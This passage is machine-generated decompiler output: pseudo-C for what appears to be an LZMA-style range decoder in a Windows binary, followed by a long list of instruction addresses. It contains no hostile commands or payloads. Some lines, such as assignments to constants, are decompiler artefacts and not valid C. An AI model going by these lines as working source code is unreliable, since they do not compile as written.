                                                                                                                          											case 0xf:
                                                                                                                          												L58:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xf;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t203 = __ebp - 0x70;
                                                                                                                          												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t203;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												L60:
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													L55:
                                                                                                                          													__al =  *(__ebp - 0x44);
                                                                                                                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          													goto L56;
                                                                                                                          												}
                                                                                                                          												L61:
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												__edx = __ebx + __ebx;
                                                                                                                          												__ecx =  *(__ebp - 0x10);
                                                                                                                          												__esi = __edx + __eax;
                                                                                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edi = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													_t217 = __edx + 1; // 0x1
                                                                                                                          													__ebx = _t217;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edi;
                                                                                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													goto L60;
                                                                                                                          												} else {
                                                                                                                          													goto L58;
                                                                                                                          												}
                                                                                                                          											case 0x10:
                                                                                                                          												L109:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0x10;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t365 = __ebp - 0x70;
                                                                                                                          												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t365;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												goto L111;
                                                                                                                          											case 0x11:
                                                                                                                          												goto L69;
                                                                                                                          											case 0x12:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__eax =  *(__ebp - 0x58);
                                                                                                                          													 *(__ebp - 0x84) = 0x13;
                                                                                                                          													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                          													while(1) {
                                                                                                                          														L132:
                                                                                                                          														 *(_t613 - 0x54) = _t606;
                                                                                                                          														goto L133;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x4c);
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                          												__ecx =  *(__ebp - 0x58);
                                                                                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                          												goto L130;
                                                                                                                          											case 0x13:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													_t469 = __ebp - 0x58;
                                                                                                                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                          													__eflags =  *_t469;
                                                                                                                          													 *(__ebp - 0x30) = 0x10;
                                                                                                                          													 *(__ebp - 0x40) = 8;
                                                                                                                          													L144:
                                                                                                                          													 *(__ebp - 0x7c) = 0x14;
                                                                                                                          													goto L145;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x4c);
                                                                                                                          												__ecx =  *(__ebp - 0x58);
                                                                                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          												 *(__ebp - 0x30) = 8;
                                                                                                                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                          												L130:
                                                                                                                          												 *(__ebp - 0x58) = __eax;
                                                                                                                          												 *(__ebp - 0x40) = 3;
                                                                                                                          												goto L144;
                                                                                                                          											case 0x14:
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                          												__eax =  *(__ebp - 0x80);
                                                                                                                          												 *(_t613 - 0x88) = _t533;
                                                                                                                          												goto L1;
                                                                                                                          											case 0x15:
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          												__al = __al & 0x000000fd;
                                                                                                                          												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          												goto L120;
                                                                                                                          											case 0x16:
                                                                                                                          												__eax =  *(__ebp - 0x30);
                                                                                                                          												__eflags = __eax - 4;
                                                                                                                          												if(__eax >= 4) {
                                                                                                                          													_push(3);
                                                                                                                          													_pop(__eax);
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                                          												 *(__ebp - 0x40) = 6;
                                                                                                                          												__eax = __eax << 7;
                                                                                                                          												 *(__ebp - 0x7c) = 0x19;
                                                                                                                          												 *(__ebp - 0x58) = __eax;
                                                                                                                          												goto L145;
                                                                                                                          											case 0x17:
                                                                                                                          												L145:
                                                                                                                          												__eax =  *(__ebp - 0x40);
                                                                                                                          												 *(__ebp - 0x50) = 1;
                                                                                                                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                          												goto L149;
                                                                                                                          											case 0x18:
                                                                                                                          												L146:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0x18;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t484 = __ebp - 0x70;
                                                                                                                          												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t484;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												L148:
                                                                                                                          												_t487 = __ebp - 0x48;
                                                                                                                          												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                          												__eflags =  *_t487;
                                                                                                                          												L149:
                                                                                                                          												__eflags =  *(__ebp - 0x48);
                                                                                                                          												if( *(__ebp - 0x48) <= 0) {
                                                                                                                          													__ecx =  *(__ebp - 0x40);
                                                                                                                          													__ebx =  *(__ebp - 0x50);
                                                                                                                          													0 = 1;
                                                                                                                          													__eax = 1 << __cl;
                                                                                                                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                          													__eax =  *(__ebp - 0x7c);
                                                                                                                          													 *(__ebp - 0x44) = __ebx;
                                                                                                                          													while(1) {
                                                                                                                          														 *(_t613 - 0x88) = _t533;
                                                                                                                          														goto L1;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x50);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												__esi = __edx + __eax;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												__edi = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eax = __eax - __ecx;
                                                                                                                          													__edx = __edx + 1;
                                                                                                                          													__eflags = __edx;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          													 *(__ebp - 0x50) = __edx;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edi;
                                                                                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													goto L148;
                                                                                                                          												} else {
                                                                                                                          													goto L146;
                                                                                                                          												}
                                                                                                                          											case 0x19:
                                                                                                                          												__eflags = __ebx - 4;
                                                                                                                          												if(__ebx < 4) {
                                                                                                                          													 *(__ebp - 0x2c) = __ebx;
                                                                                                                          													L119:
                                                                                                                          													_t393 = __ebp - 0x2c;
                                                                                                                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                          													__eflags =  *_t393;
                                                                                                                          													L120:
                                                                                                                          													__eax =  *(__ebp - 0x2c);
                                                                                                                          													__eflags = __eax;
                                                                                                                          													if(__eax == 0) {
                                                                                                                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                          														goto L170;
                                                                                                                          													}
                                                                                                                          													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                          													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                          														goto L171;
                                                                                                                          													}
                                                                                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                          													__eax =  *(__ebp - 0x30);
                                                                                                                          													_t400 = __ebp - 0x60;
                                                                                                                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                          													__eflags =  *_t400;
                                                                                                                          													goto L123;
                                                                                                                          												}
                                                                                                                          												__ecx = __ebx;
                                                                                                                          												__eax = __ebx;
                                                                                                                          												__ecx = __ebx >> 1;
                                                                                                                          												__eax = __ebx & 0x00000001;
                                                                                                                          												__ecx = (__ebx >> 1) - 1;
                                                                                                                          												__al = __al | 0x00000002;
                                                                                                                          												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                          												__eflags = __ebx - 0xe;
                                                                                                                          												 *(__ebp - 0x2c) = __eax;
                                                                                                                          												if(__ebx >= 0xe) {
                                                                                                                          													__ebx = 0;
                                                                                                                          													 *(__ebp - 0x48) = __ecx;
                                                                                                                          													L102:
                                                                                                                          													__eflags =  *(__ebp - 0x48);
                                                                                                                          													if( *(__ebp - 0x48) <= 0) {
                                                                                                                          														__eax = __eax + __ebx;
                                                                                                                          														 *(__ebp - 0x40) = 4;
                                                                                                                          														 *(__ebp - 0x2c) = __eax;
                                                                                                                          														__eax =  *(__ebp - 4);
                                                                                                                          														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                          														__eflags = __eax;
                                                                                                                          														L108:
                                                                                                                          														__ebx = 0;
                                                                                                                          														 *(__ebp - 0x58) = __eax;
                                                                                                                          														 *(__ebp - 0x50) = 1;
                                                                                                                          														 *(__ebp - 0x44) = 0;
                                                                                                                          														 *(__ebp - 0x48) = 0;
                                                                                                                          														L112:
                                                                                                                          														__eax =  *(__ebp - 0x40);
                                                                                                                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                          															_t391 = __ebp - 0x2c;
                                                                                                                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                          															__eflags =  *_t391;
                                                                                                                          															goto L119;
                                                                                                                          														}
                                                                                                                          														__eax =  *(__ebp - 0x50);
                                                                                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          														__eax =  *(__ebp - 0x58);
                                                                                                                          														__esi = __edi + __eax;
                                                                                                                          														 *(__ebp - 0x54) = __esi;
                                                                                                                          														__ax =  *__esi;
                                                                                                                          														__ecx = __ax & 0x0000ffff;
                                                                                                                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                          														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                          														if( *(__ebp - 0xc) >= __edx) {
                                                                                                                          															__ecx = 0;
                                                                                                                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                          															__ecx = 1;
                                                                                                                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                          															__ebx = 1;
                                                                                                                          															__ecx =  *(__ebp - 0x48);
                                                                                                                          															__ebx = 1 << __cl;
                                                                                                                          															__ecx = 1 << __cl;
                                                                                                                          															__ebx =  *(__ebp - 0x44);
                                                                                                                          															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                          															__cx = __ax;
                                                                                                                          															__cx = __ax >> 5;
                                                                                                                          															__eax = __eax - __ecx;
                                                                                                                          															__edi = __edi + 1;
                                                                                                                          															__eflags = __edi;
                                                                                                                          															 *(__ebp - 0x44) = __ebx;
                                                                                                                          															 *__esi = __ax;
                                                                                                                          															 *(__ebp - 0x50) = __edi;
                                                                                                                          														} else {
                                                                                                                          															 *(__ebp - 0x10) = __edx;
                                                                                                                          															0x800 = 0x800 - __ecx;
                                                                                                                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          															 *__esi = __dx;
                                                                                                                          														}
                                                                                                                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          															L111:
                                                                                                                          															_t368 = __ebp - 0x48;
                                                                                                                          															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                          															__eflags =  *_t368;
                                                                                                                          															goto L112;
                                                                                                                          														} else {
                                                                                                                          															goto L109;
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          													__ecx =  *(__ebp - 0xc);
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          													 *(__ebp - 0x44) = __ebx;
                                                                                                                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                          														__ecx =  *(__ebp - 0x10);
                                                                                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          														__ebx = __ebx | 0x00000001;
                                                                                                                          														__eflags = __ebx;
                                                                                                                          														 *(__ebp - 0x44) = __ebx;
                                                                                                                          													}
                                                                                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          														L101:
                                                                                                                          														_t338 = __ebp - 0x48;
                                                                                                                          														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                          														__eflags =  *_t338;
                                                                                                                          														goto L102;
                                                                                                                          													} else {
                                                                                                                          														goto L99;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__edx =  *(__ebp - 4);
                                                                                                                          												__eax = __eax - __ebx;
                                                                                                                          												 *(__ebp - 0x40) = __ecx;
                                                                                                                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                          												goto L108;
                                                                                                                          											case 0x1a:
                                                                                                                          												L56:
                                                                                                                          												__eflags =  *(__ebp - 0x64);
                                                                                                                          												if( *(__ebp - 0x64) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0x1a;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x68);
                                                                                                                          												__al =  *(__ebp - 0x5c);
                                                                                                                          												__edx =  *(__ebp - 8);
                                                                                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          												 *( *(__ebp - 0x68)) = __al;
                                                                                                                          												__ecx =  *(__ebp - 0x14);
                                                                                                                          												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                          												__eax = __ecx + 1;
                                                                                                                          												__edx = 0;
                                                                                                                          												_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          												__edx = _t192;
                                                                                                                          												goto L80;
                                                                                                                          											case 0x1b:
                                                                                                                          												L76:
                                                                                                                          												__eflags =  *(__ebp - 0x64);
                                                                                                                          												if( *(__ebp - 0x64) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0x1b;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          													__eflags = __eax;
                                                                                                                          												}
                                                                                                                          												__edx =  *(__ebp - 8);
                                                                                                                          												__cl =  *(__eax + __edx);
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												 *(__ebp - 0x5c) = __cl;
                                                                                                                          												 *(__eax + __edx) = __cl;
                                                                                                                          												__eax = __eax + 1;
                                                                                                                          												__edx = 0;
                                                                                                                          												_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          												__edx = _t275;
                                                                                                                          												__eax =  *(__ebp - 0x68);
                                                                                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          												_t284 = __ebp - 0x64;
                                                                                                                          												 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                          												__eflags =  *_t284;
                                                                                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          												L80:
                                                                                                                          												 *(__ebp - 0x14) = __edx;
                                                                                                                          												goto L81;
                                                                                                                          											case 0x1c:
                                                                                                                          												while(1) {
                                                                                                                          													L123:
                                                                                                                          													__eflags =  *(__ebp - 0x64);
                                                                                                                          													if( *(__ebp - 0x64) == 0) {
                                                                                                                          														break;
                                                                                                                          													}
                                                                                                                          													__eax =  *(__ebp - 0x14);
                                                                                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          														__eflags = __eax;
                                                                                                                          													}
                                                                                                                          													__edx =  *(__ebp - 8);
                                                                                                                          													__cl =  *(__eax + __edx);
                                                                                                                          													__eax =  *(__ebp - 0x14);
                                                                                                                          													 *(__ebp - 0x5c) = __cl;
                                                                                                                          													 *(__eax + __edx) = __cl;
                                                                                                                          													__eax = __eax + 1;
                                                                                                                          													__edx = 0;
                                                                                                                          													_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                          													__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          													__edx = _t414;
                                                                                                                          													__eax =  *(__ebp - 0x68);
                                                                                                                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                          													__eflags =  *(__ebp - 0x30);
                                                                                                                          													 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          													 *(__ebp - 0x14) = _t414;
                                                                                                                          													if( *(__ebp - 0x30) > 0) {
                                                                                                                          														continue;
                                                                                                                          													} else {
                                                                                                                          														L81:
                                                                                                                          														 *(__ebp - 0x88) = 2;
                                                                                                                          														goto L1;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												 *(__ebp - 0x88) = 0x1c;
                                                                                                                          												goto L170;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          									L171:
                                                                                                                          									_t535 = _t534 | 0xffffffff;
                                                                                                                          									goto L172;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					goto L1;
                                                                                                                          				}
                                                                                                                          			}













                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405fa8
                                                                                                                          0x00405faa
                                                                                                                          0x00405fad
                                                                                                                          0x0040601e
                                                                                                                          0x00406021
                                                                                                                          0x00406024
                                                                                                                          0x0040602b
                                                                                                                          0x00406035
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00405faf
                                                                                                                          0x00405fb3
                                                                                                                          0x00405fb6
                                                                                                                          0x00405fb8
                                                                                                                          0x00405fbb
                                                                                                                          0x00405fbe
                                                                                                                          0x00405fc0
                                                                                                                          0x00405fc3
                                                                                                                          0x00405fc5
                                                                                                                          0x00405fca
                                                                                                                          0x00405fcd
                                                                                                                          0x00405fd0
                                                                                                                          0x00405fd4
                                                                                                                          0x00405fdb
                                                                                                                          0x00405fde
                                                                                                                          0x00405fe5
                                                                                                                          0x00405fe9
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405ff5
                                                                                                                          0x00405ff8
                                                                                                                          0x00406016
                                                                                                                          0x00406018
                                                                                                                          0x00000000
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffd
                                                                                                                          0x00406000
                                                                                                                          0x00406003
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406008
                                                                                                                          0x0040600b
                                                                                                                          0x0040600d
                                                                                                                          0x0040600e
                                                                                                                          0x00406011
                                                                                                                          0x00000000
                                                                                                                          0x00406011
                                                                                                                          0x00000000
                                                                                                                          0x00406247
                                                                                                                          0x0040624b
                                                                                                                          0x00406269
                                                                                                                          0x0040626c
                                                                                                                          0x00406273
                                                                                                                          0x00406276
                                                                                                                          0x00406279
                                                                                                                          0x0040627c
                                                                                                                          0x0040627f
                                                                                                                          0x00406282
                                                                                                                          0x00406284
                                                                                                                          0x0040628b
                                                                                                                          0x0040628c
                                                                                                                          0x0040628e
                                                                                                                          0x00406291
                                                                                                                          0x00406294
                                                                                                                          0x00406297
                                                                                                                          0x00406297
                                                                                                                          0x0040629c
                                                                                                                          0x00000000
                                                                                                                          0x0040629c
                                                                                                                          0x0040624d
                                                                                                                          0x00406250
                                                                                                                          0x00406253
                                                                                                                          0x0040625d
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x004062b1
                                                                                                                          0x004062b5
                                                                                                                          0x004062d8
                                                                                                                          0x004062db
                                                                                                                          0x004062de
                                                                                                                          0x004062e8
                                                                                                                          0x004062b7
                                                                                                                          0x004062b7
                                                                                                                          0x004062ba
                                                                                                                          0x004062bd
                                                                                                                          0x004062c0
                                                                                                                          0x004062cd
                                                                                                                          0x004062d0
                                                                                                                          0x004062d0
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x004062f4
                                                                                                                          0x004062f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062fe
                                                                                                                          0x00406302
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406308
                                                                                                                          0x0040630a
                                                                                                                          0x0040630e
                                                                                                                          0x0040630e
                                                                                                                          0x00406311
                                                                                                                          0x00406315
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040638c
                                                                                                                          0x00406390
                                                                                                                          0x00406397
                                                                                                                          0x0040639a
                                                                                                                          0x0040639d
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x004063a0
                                                                                                                          0x004063a3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040644c
                                                                                                                          0x0040644c
                                                                                                                          0x00406450
                                                                                                                          0x004067ee
                                                                                                                          0x00000000
                                                                                                                          0x004067ee
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645c
                                                                                                                          0x00406460
                                                                                                                          0x00406463
                                                                                                                          0x00406469
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646e
                                                                                                                          0x00406471
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406041
                                                                                                                          0x00406041
                                                                                                                          0x00406045
                                                                                                                          0x004067b2
                                                                                                                          0x00000000
                                                                                                                          0x004067b2
                                                                                                                          0x0040604b
                                                                                                                          0x0040604e
                                                                                                                          0x00406051
                                                                                                                          0x00406055
                                                                                                                          0x00406058
                                                                                                                          0x0040605e
                                                                                                                          0x00406060
                                                                                                                          0x00406060
                                                                                                                          0x00406060
                                                                                                                          0x00406063
                                                                                                                          0x00406066
                                                                                                                          0x00406066
                                                                                                                          0x00406069
                                                                                                                          0x0040606c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406072
                                                                                                                          0x00406078
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040607e
                                                                                                                          0x0040607e
                                                                                                                          0x00406082
                                                                                                                          0x00406085
                                                                                                                          0x00406088
                                                                                                                          0x0040608b
                                                                                                                          0x0040608e
                                                                                                                          0x0040608f
                                                                                                                          0x00406092
                                                                                                                          0x00406094
                                                                                                                          0x0040609a
                                                                                                                          0x0040609d
                                                                                                                          0x004060a0
                                                                                                                          0x004060a3
                                                                                                                          0x004060a6
                                                                                                                          0x004060a9
                                                                                                                          0x004060ac
                                                                                                                          0x004060c8
                                                                                                                          0x004060cb
                                                                                                                          0x004060ce
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x00406750
                                                                                                                          0x00406753
